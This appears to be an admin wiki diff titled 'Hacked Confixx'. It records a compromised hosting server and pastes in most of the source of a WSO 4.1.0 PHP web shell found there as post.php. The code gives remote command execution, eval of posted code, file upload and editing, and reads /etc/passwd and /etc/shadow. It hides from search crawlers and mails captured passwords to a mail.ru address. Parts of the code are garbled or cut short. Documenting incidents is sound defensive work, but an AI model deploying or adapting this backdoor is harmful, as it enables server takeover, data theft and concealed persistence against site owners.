Hacked Confixx
Zeile 2.644: | Zeile 2.644: | ||
./mskin_15/big_icons/guest.php | ./mskin_15/big_icons/guest.php | ||
./mskin_15/big_icons/messages.php | ./mskin_15/big_icons/messages.php | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ---- | ||
+ | |||
+ | login-102.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/nagioss -> shell | ||
+ | |||
+ | /home/www/confixx/html/post.php | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | <?php | ||
+ | //-----------------Password--------------------- | ||
+ | $â297a57a5a743894a0e4a801fc3"; //admin | ||
+ | $â = "#fff"; | ||
+ | $â = true; | ||
+ | $â = 'UTF-8'; | ||
+ | $â = 'FilesMan'; | ||
+ | $â = md5($_SERVER['HTTP_USER_AGENT']); | ||
+ | if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST'])."key", $â); | ||
+ | } | ||
+ | if(empty($_POST['charset'])) | ||
+ | $_POST['charset'] = $â; | ||
+ | if (!isset($_POST['ne'])) { | ||
+ | if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | } | ||
+ | function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);} | ||
+ | @ini_set('error_log',NULL); | ||
+ | @ini_set('log_errors',0); | ||
+ | @ini_set('max_execution_time',0); | ||
+ | @set_time_limit(0); | ||
+ | @set_magic_quotes_runtime(0); | ||
+ | @define('VERSION', '4.1.0'); | ||
+ | if(get_magic_quotes_gpc()) { | ||
+ | function stripslashes_array($array) { | ||
+ | return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); | ||
+ | } | ||
+ | $_POST = stripslashes_array($_POST); | ||
+ | $_COOKIE = stripslashes_array($_COOKIE); | ||
+ | } | ||
+ | if(!empty($â | ||
+ | if(isset($_POST['pass']) && (md5($_POST['pass']) == $â | ||
+ | rototype(md5($_SERVER['HTTP_HOST']), $â | ||
+ | f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â | ||
+ | ardLogin(); | ||
+ | } | ||
+ | if(strtolower(substr(PHP_OS,0,3)) == "win") | ||
+ | $os = 'win'; | ||
+ | else | ||
+ | $os = 'nix'; | ||
+ | $safe_mode = @ini_get('safe_mode'); | ||
+ | if(!$safe_mode) | ||
+ | error_reporting(0); | ||
+ | $disable_functions = @ini_get('disable_functions'); | ||
+ | $home_cwd = @getcwd(); | ||
+ | if(isset($_POST['c'])) | ||
+ | @chdir($_POST['c']); | ||
+ | $cwd = @getcwd(); | ||
+ | if($os == 'win') { | ||
+ | $home_cwd = str_replace("\\", "/", $home_cwd); | ||
+ | $cwd = str_replace("\\", "/", $cwd); | ||
+ | } | ||
+ | if($cwd[strlen($cwd)-1] != '/') | ||
+ | $cwd .= '/'; | ||
+ | function hardHeader() { | ||
+ | if(empty($_POST['charset'])) | ||
+ | $_POST['charset'] = $GLOBALS['â']; | ||
+ | global $â; | ||
+ | echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title> | ||
+ | <style> | ||
+ | body {background-color:#060a10;color:#e1e1e1;} | ||
+ | body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;} | ||
+ | table.info {color:#C3C3C3;background-color:#060a10;} | ||
+ | span,h1,a {color:$â !important;} | ||
+ | span {font-weight:bolder;} | ||
+ | h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;} | ||
+ | div.content {padding:5px;margin-left:5px;background-color:#060a10;} | ||
+ | a {text-decoration:none;} | ||
+ | a:hover {text-decoration:underline;} | ||
+ | .ml1 {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;} | ||
+ | .bigarea {width:100%;height:250px; } | ||
+ | input, textarea, select {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;} | ||
+ | form {margin:0px;} | ||
+ | #toolsTbl {text-align:center;} | ||
+ | .toolsInp {width:300px} | ||
+ | .main th {text-align:left;background-color:#060a10;} | ||
+ | .main tr:hover{background-color:#354252;} | ||
+ | .main td, th{vertical-align:middle;} | ||
+ | .l1 {background-color:#1e252e;} | ||
+ | pre {font:9pt Courier New;} | ||
+ | </style> | ||
+ | <script> | ||
+ | var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; | ||
+ | var a_ = '" . htmlspecialchars(@$_POST['a']) ."' | ||
+ | var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; | ||
+ | var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; | ||
+ | var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; | ||
+ | var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; | ||
+ | var d = document; | ||
+ | |||
+ | function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);} | ||
+ | function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;} | ||
+ | function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;} | ||
+ | function set(a,c,p1,p2,p3,charset) { | ||
+ | if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; | ||
+ | if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; | ||
+ | if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; | ||
+ | if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; | ||
+ | if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; | ||
+ | d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; | ||
+ | } | ||
+ | function g(a,c,p1,p2,p3,charset) { | ||
+ | set(a,c,p1,p2,p3,charset); | ||
+ | d.mf.submit(); | ||
+ | } | ||
+ | function a(a,c,p1,p2,p3,charset) { | ||
+ | set(a,c,p1,p2,p3,charset); | ||
+ | var params = 'ajax=true'; | ||
+ | for(i=0;i<d.mf.elements.length;i++) | ||
+ | params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); | ||
+ | sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); | ||
+ | } | ||
+ | function sr(url, params) { | ||
+ | if (window.XMLHttpRequest) | ||
+ | req = new XMLHttpRequest(); | ||
+ | else if (window.ActiveXObject) | ||
+ | req = new ActiveXObject('Microsoft.XMLHTTP'); | ||
+ | if (req) { | ||
+ | req.onreadystatechange = processReqChange; | ||
+ | req.open('POST', url, true); | ||
+ | req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); | ||
+ | req.send(params); | ||
+ | } | ||
+ | } | ||
+ | function processReqChange() { | ||
+ | if( (req.readyState == 4) ) | ||
+ | if(req.status == 200) { | ||
+ | var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); | ||
+ | var arr=reg.exec(req.responseText); | ||
+ | eval(arr[2].substr(0, arr[1])); | ||
+ | } else alert('Request error!'); | ||
+ | } | ||
+ | </script> | ||
+ | <head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'> | ||
+ | <form method=post name=mf style='display:none;'> | ||
+ | <input type=hidden name=a> | ||
+ | <input type=hidden name=c> | ||
+ | <input type=hidden name=p1> | ||
+ | <input type=hidden name=p2> | ||
+ | <input type=hidden name=p3> | ||
+ | <input type=hidden name=charset> | ||
+ | </form>"; | ||
+ | $freeSpace = @diskfreespace($GLOBALS['cwd']); | ||
+ | $totalSpace = @disk_total_space($GLOBALS['cwd']); | ||
+ | $totalSpace = $totalSpace?$totalSpace:1; | ||
+ | $release = @php_uname('r'); | ||
+ | $kernel = @php_uname('s'); | ||
+ | $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; | ||
+ | if(strpos('Linux', $kernel) !== false) | ||
+ | $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); | ||
+ | else | ||
+ | $explink .= urlencode($kernel . ' ' . substr($release,0,3)); | ||
+ | if(!function_exists('posix_getegid')) { | ||
+ | $user = @get_current_user(); | ||
+ | $uid = @getmyuid(); | ||
+ | $gid = @getmygid(); | ||
+ | $group = "?"; | ||
+ | } else { | ||
+ | $uid = @posix_getpwuid(@posix_geteuid()); | ||
+ | $gid = @posix_getgrgid(@posix_getegid()); | ||
+ | $user = $uid['name']; | ||
+ | $uid = $uid['uid']; | ||
+ | $group = $gid['name']; | ||
+ | $gid = $gid['gid']; | ||
+ | } | ||
+ | $cwd_links = ''; | ||
+ | $path = explode("/", $GLOBALS['cwd']); | ||
+ | $n=count($path); | ||
+ | for($i=0; $i<$n-1; $i++) { | ||
+ | $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; | ||
+ | for($j=0; $j<=$i; $j++) | ||
+ | $cwd_links .= $path[$j].'/'; | ||
+ | $cwd_links .= "\")'>".$path[$i]."/</a>"; | ||
+ | } | ||
+ | $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); | ||
+ | $opt_charsets = ''; | ||
+ | foreach($charsets as $â) | ||
+ | $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>'; | ||
+ | $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); | ||
+ | if(!empty($GLOBALS['â)) | ||
+ | $m['Logout'] = 'Logout'; | ||
+ | $m['Self remove'] = 'SelfRemove'; | ||
+ | $menu = ''; | ||
+ | foreach($m as $k => $v) | ||
+ | $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; | ||
+ | $drives = ""; | ||
+ | if ($GLOBALS['os'] == 'win') { | ||
+ | foreach(range('c','z') as $drive) | ||
+ | if (is_dir($drive.':\\')) | ||
+ | $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; | ||
+ | } | ||
+ | echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'. | ||
+ | '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'. | ||
+ | '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'. | ||
+ | '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>'; | ||
+ | } | ||
+ | function hardFooter() { | ||
+ | $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>"; | ||
+ | echo " | ||
+ | </div> | ||
+ | <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%> | ||
+ | <tr> | ||
+ | <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> | ||
+ | <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | ||
+ | </tr><tr> | ||
+ | <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> | ||
+ | <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | ||
+ | </tr><tr> | ||
+ | <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> | ||
+ | <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'> | ||
+ | <input type=hidden name=a value='FilesMan'> | ||
+ | <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> | ||
+ | <input type=hidden name=p1 value='uploadFile'> | ||
+ | <input type=hidden name=ne value=''> | ||
+ | <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> | ||
+ | <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='>>'></form><br ></td> | ||
+ | </tr></table></div></body></html>"; | ||
+ | } | ||
+ | if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } | ||
+ | if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } | ||
+ | function ex($in) { | ||
+ | $â = ''; | ||
+ | if (function_exists('exec')) { | ||
+ | @exec($in,$â); | ||
+ | $â = @join("\n",$â); | ||
+ | } elseif (function_exists('passthru')) { | ||
+ | ob_start(); | ||
+ | @passthru($in); | ||
+ | $â = ob_get_clean(); | ||
+ | } elseif (function_exists('system')) { | ||
+ | ob_start(); | ||
+ | @system($in); | ||
+ | $â = ob_get_clean(); | ||
+ | } elseif (function_exists('shell_exec')) { | ||
+ | $â = shell_exec($in); | ||
+ | } elseif (is_resource($f = @popen($in,"r"))) { | ||
+ | $â = ""; | ||
+ | while(!@feof($f)) | ||
+ | $â .= fread($f,1024); | ||
+ | pclose($f); | ||
+ | }else return "â³ Unable to execute command\n"; | ||
+ | return ($â==''?"â³ Query did not return anything\n":$â); | ||
+ | } | ||
+ | if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) | ||
+ | $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â; | ||
+ | |||
+ | if(array_key_exists('pff',$_POST)){ | ||
+ | $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp); | ||
+ | } | ||
+ | function hardLogin() { | ||
+ | if(!empty($_SERVER['HTTP_USER_AGENT'])) { | ||
+ | $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); | ||
+ | if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { | ||
+ | header('HTTP/1.0 404 Not Found'); | ||
+ | exit; | ||
+ | } | ||
+ | } | ||
+ | die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>"); | ||
+ | } | ||
+ | function viewSize($s) { | ||
+ | if($s >= 1073741824) | ||
+ | return sprintf('%1.2f', $s / 1073741824 ). ' GB'; | ||
+ | elseif($s >= 1048576) | ||
+ | return sprintf('%1.2f', $s / 1048576 ) . ' MB'; | ||
+ | elseif($s >= 1024) | ||
+ | return sprintf('%1.2f', $s / 1024 ) . ' KB'; | ||
+ | else | ||
+ | return $s . ' B'; | ||
+ | } | ||
+ | function perms($p) { | ||
+ | if (($p & 0xC000) == 0xC000)$i = 's'; | ||
+ | elseif (($p & 0xA000) == 0xA000)$i = 'l'; | ||
+ | elseif (($p & 0x8000) == 0x8000)$i = '-'; | ||
+ | elseif (($p & 0x6000) == 0x6000)$i = 'b'; | ||
+ | elseif (($p & 0x4000) == 0x4000)$i = 'd'; | ||
+ | elseif (($p & 0x2000) == 0x2000)$i = 'c'; | ||
+ | elseif (($p & 0x1000) == 0x1000)$i = 'p'; | ||
+ | else $i = 'u'; | ||
+ | $i .= (($p & 0x0100) ? 'r' : '-'); | ||
+ | $i .= (($p & 0x0080) ? 'w' : '-'); | ||
+ | $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); | ||
+ | $i .= (($p & 0x0020) ? 'r' : '-'); | ||
+ | $i .= (($p & 0x0010) ? 'w' : '-'); | ||
+ | $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); | ||
+ | $i .= (($p & 0x0004) ? 'r' : '-'); | ||
+ | $i .= (($p & 0x0002) ? 'w' : '-'); | ||
+ | $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); | ||
+ | return $i; | ||
+ | } | ||
+ | function viewPermsColor($f) { | ||
+ | if (!@is_readable($f)) | ||
+ | return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; | ||
+ | elseif (!@is_writable($f)) | ||
+ | return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; | ||
+ | else | ||
+ | return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>'; | ||
+ | } | ||
+ | function hardScandir($dir) { | ||
+ | if(function_exists("scandir")) { | ||
+ | return scandir($dir); | ||
+ | } else { | ||
+ | $dh = opendir($dir); | ||
+ | while (false !== ($filename = readdir($dh))) | ||
+ | $files[] = $filename; | ||
+ | return $files; | ||
+ | } | ||
+ | } | ||
+ | function which($p) { | ||
+ | $path = ex('which ' . $p); | ||
+ | if(!empty($path)) | ||
+ | return $path; | ||
+ | return false; | ||
+ | } | ||
+ | function actionRC() { | ||
+ | if(!@$_POST['p1']) { | ||
+ | $a = array( | ||
+ | "uname" => php_uname(), | ||
+ | "php_version" => phpversion(), | ||
+ | "VERSION" => VERSION, | ||
+ | "safemode" => @ini_get('safe_mode') | ||
+ | ); | ||
+ | echo serialize($a); | ||
+ | } else { | ||
+ | eval($_POST['p1']); | ||
+ | } | ||
+ | } | ||
+ | function prototype($k, $v) { | ||
+ | $_COOKIE[$k] = $v; | ||
+ | setcookie($k, $v); | ||
+ | } | ||
+ | function actionSecInfo() { | ||
+ | hardHeader(); | ||
+ | echo '<h1>Server security information</h1><div class=content>'; | ||
+ | function showSecParam($n, $v) { | ||
+ | $v = trim($v); | ||
+ | if($v) { | ||
+ | echo '<span>' . $n . ': </span>'; | ||
+ | if(strpos($v, "\n") === false) | ||
+ | echo $v . '<br>'; | ||
+ | else | ||
+ | echo '<pre class=ml1>' . $v . '</pre>'; | ||
+ | } | ||
+ | } | ||
+ | showSecParam('Server software', @getenv('SERVER_SOFTWARE')); | ||
+ | if(function_exists('apache_get_modules')) | ||
+ | showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); | ||
+ | showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); | ||
+ | showSecParam('Open base dir', @ini_get('open_basedir')); | ||
+ | showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); | ||
+ | showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); | ||
+ | showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); | ||
+ | $temp=array(); | ||
+ | if(function_exists('mysql_get_client_info')) | ||
+ | $temp[] = "MySql (".mysql_get_client_info().")"; | ||
+ | if(function_exists('mssql_connect')) | ||
+ | $temp[] = "MSSQL"; | ||
+ | if(function_exists('pg_connect')) | ||
+ | $temp[] = "PostgreSQL"; | ||
+ | if(function_exists('oci_connect')) | ||
+ | $temp[] = "Oracle"; | ||
+ | showSecParam('Supported databases', implode(', ', $temp)); | ||
+ | echo '<br>'; | ||
+ | if($GLOBALS['os'] == 'nix') { | ||
+ | showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); | ||
+ | showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); | ||
+ | showSecParam('OS version', @file_get_contents('/proc/version')); | ||
+ | showSecParam('Distr name', @file_get_contents('/etc/issue.net')); | ||
+ | if(!$GLOBALS['safe_mode']) { | ||
+ | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); | ||
+ | $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); | ||
+ | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); | ||
+ | echo '<br>'; | ||
+ | $temp=array(); | ||
+ | foreach ($userful as $â) | ||
+ | if(which($â)) | ||
+ | $temp[] = $â; | ||
+ | showSecParam('Userful', implode(', ',$temp)); | ||
+ | $temp=array(); | ||
+ | foreach ($danger as $â) | ||
+ | if(which($â)) | ||
+ | $temp[] = $â; | ||
+ | showSecParam('Danger', implode(', ',$temp)); | ||
+ | $temp=array(); | ||
+ | foreach ($downloaders as $â) | ||
+ | if(which($â)) | ||
+ | $temp[] = $â; | ||
+ | showSecParam('Downloaders', implode(', ',$temp)); | ||
+ | echo '<br/>'; | ||
+ | showSecParam('HDD space', ex('df -h')); | ||
+ | showSecParam('Hosts', @file_get_contents('/etc/hosts')); | ||
+ | showSecParam('Mount options', @file_get_contents('/etc/fstab')); | ||
+ | } | ||
+ | } else { | ||
+ | showSecParam('OS Version',ex('ver')); | ||
+ | showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); | ||
+ | showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionFilesTools() { | ||
+ | if( isset($_POST['p1']) ) | ||
+ | $_POST['p1'] = urldecode($_POST['p1']); | ||
+ | if(@$_POST['p2']=='download') { | ||
+ | if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { | ||
+ | ob_start("ob_gzhandler", 4096); | ||
+ | header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); | ||
+ | if (function_exists("mime_content_type")) { | ||
+ | $type = @mime_content_type($_POST['p1']); | ||
+ | header("Content-Type: " . $type); | ||
+ | } else | ||
+ | header("Content-Type: application/octet-stream"); | ||
+ | $fp = @fopen($_POST['p1'], "r"); | ||
+ | if($fp) { | ||
+ | while(!@feof($fp)) | ||
+ | echo @fread($fp, 1024); | ||
+ | fclose($fp); | ||
+ | } | ||
+ | }exit; | ||
+ | } | ||
+ | if( @$_POST['p2'] == 'mkfile' ) { | ||
+ | if(!file_exists($_POST['p1'])) { | ||
+ | $fp = @fopen($_POST['p1'], 'w'); | ||
+ | if($fp) { | ||
+ | $_POST['p2'] = "edit"; | ||
+ | fclose($fp); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | hardHeader(); | ||
+ | echo '<h1>File tools</h1><div class=content>'; | ||
+ | if( !file_exists(@$_POST['p1']) ) { | ||
+ | echo 'File not exists'; | ||
+ | hardFooter(); | ||
+ | return; | ||
+ | } | ||
+ | $uid = @posix_getpwuid(@fileowner($_POST['p1'])); | ||
+ | if(!$uid) { | ||
+ | $uid['name'] = @fileowner($_POST['p1']); | ||
+ | $gid['name'] = @filegroup($_POST['p1']); | ||
+ | } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); | ||
+ | echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; | ||
+ | echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; | ||
+ | if( empty($_POST['p2']) ) | ||
+ | $_POST['p2'] = 'view'; | ||
+ | if( is_file($_POST['p1']) ) | ||
+ | $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); | ||
+ | else | ||
+ | $m = array('Chmod', 'Rename', 'Touch'); | ||
+ | foreach($m as $v) | ||
+ | echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; | ||
